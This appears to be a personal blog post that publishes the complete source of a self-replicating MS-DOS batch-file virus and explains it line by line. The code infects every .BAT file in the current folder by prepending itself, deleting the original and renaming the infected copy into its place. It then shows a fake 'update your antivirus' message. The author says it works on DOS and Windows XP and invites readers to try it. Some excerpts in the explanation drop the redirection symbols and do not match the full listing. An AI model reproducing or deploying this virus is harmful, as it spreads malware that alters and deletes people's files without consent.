BAT file virus

Back in 90’s I worked a lot in DOS, and few days ago while looking for something in old junk I found some backup CD’s from those days. It was very interesting to see what I did back then.

So, this code was never released until now, and I wrote it as a proof of concept, to find out is it possible to make virus by using only MS-DOS BAT language (no additional programs, or using debug.exe).

What are basic function of virus:

  1. It has to spread by infecting other programs.
  2. It has some payload.
  3. At the end of execution, it runs original program.

Lets go step by step, infection first. This program infects *.bat files found in the same folder where it is run from. It copy’s all lines that contains @ character from original infected bat file to non infected file, and it is intelligent enough not to infect same file twice.

Second step, payload! In this case, it is just message that tell’s you to update your antivirus software.

Third step is just execution of original bat file, so I wont write about it.

Now, let’s see some code:

@Echo Off
@CLS
@IF NOT %PTH%'==' GOTO BD_noS@
@ECHO %0>1.$1
@FIND "." 1.$1 >nul
@IF NOT ERRORLEVEL 1 GOTO BD_Ok@
@SET PTH=%0.BAT
@DEL 1.$1 >nul
@GOTO BD_noS@
:BD_Ok@
@SET PTH=%0
@DEL 1.$1 >nul
:BD_noS@
@ECHO ---------------------------------------
@ECHO  Update your antivirus program NOW !!!
@ECHO ---------------------------------------
@PAUSE >Nul
IF %1'==0123' GOTO BD_inf@
@FOR %%i IN (*.BAT) DO CALL %PTH% 0123 %%i
GOTO BD_cont@
:BD_inf@
@FIND "REM BatDist v1.0" %2 >Nul
IF ERRORLEVEL 1 GOTO BD_Star@
@GOTO BD_x
:BD_Star@
FIND "@" %PTH% >$.$
@COPY /B $.$ + %2 $.$$ >nul
@DEL $.$ >nul
@DEL %2 >nul
@REN $.$$ %2 >nul
@ECHO :BD_x >> %2
:BD_cont@
@CLS
:BD_x

I should explain this code:

– 1 –

@Echo Off
@CLS
@IF NOT %PTH%'==' GOTO BD_noS@
@ECHO %0>1.$1
@FIND "." 1.$1 >nul
@IF NOT ERRORLEVEL 1 GOTO BD_Ok@
@SET PTH=%0.BAT
@DEL 1.$1 >nul
@GOTO BD_noS@
:BD_Ok@

When you start bat file from command line, you can strat it by typing it’s name, or it’s name and extension. This part of code checks if there is extension in %0, and if it doesn’t exist it adds it to file name.

– 2 –

@ECHO ---------------------------------------
@ECHO  Update your antivirus program NOW !!!
@ECHO ---------------------------------------
@PAUSE >Nul

Just a payload.

– 3 –

IF %1'==0123' GOTO BD_inf@

If recursion is done, actually if we got name of file we have to infect, we are going to infect it

– 4 –

@FOR %%i IN (*.BAT) DO CALL %PTH% 0123 %%i

We are searching for next bat file, and we are calling original bat file with found bat file name as %2. Actually we are going to recursion.

– 5 –

GOTO BD_cont@

When we infect all bat files in folder, we’ll execute original code of infected file.

– 6 –

:BD_inf@
@FIND "REM BatDist v1.0" %2 Nul
IF ERRORLEVEL 1 GOTO BD_Star@

Checking if file is already infected

– 7 –

@GOTO BD_x

If file is infected go out from recursion

– 8 –

:BD_Star@
FIND "@" %PTH% $.$

Writing all virus code to file $.$.

– 9 –

@COPY /B $.$ + %2 $.$$ nul

An then we are adding code form bat file we want to infect to virus code and saving it to $.$$ file.

– 10 –

@DEL $.$ nul
@DEL %2 nul

Deleting files we don’t need any more.

– 11 –

@REN $.$$ %2 nul
@ECHO :BD_x  %2

Renaming temporary file with virus + original bat file to name of infected file and adding one more line to it.

This is it,… I know that there are some bugs that could be fixed, but this is minimal code that is just proof of concept. It was tested in MS-DOS 6.2, Windows 98 and Windows XP, and it works just fine. In Windows XP, find is internal command, and for previous versions it assumes that find.exe is somewhere in path.

So, try it and have a fun :)

Leave a Reply

Your email address will not be published. Required fields are marked *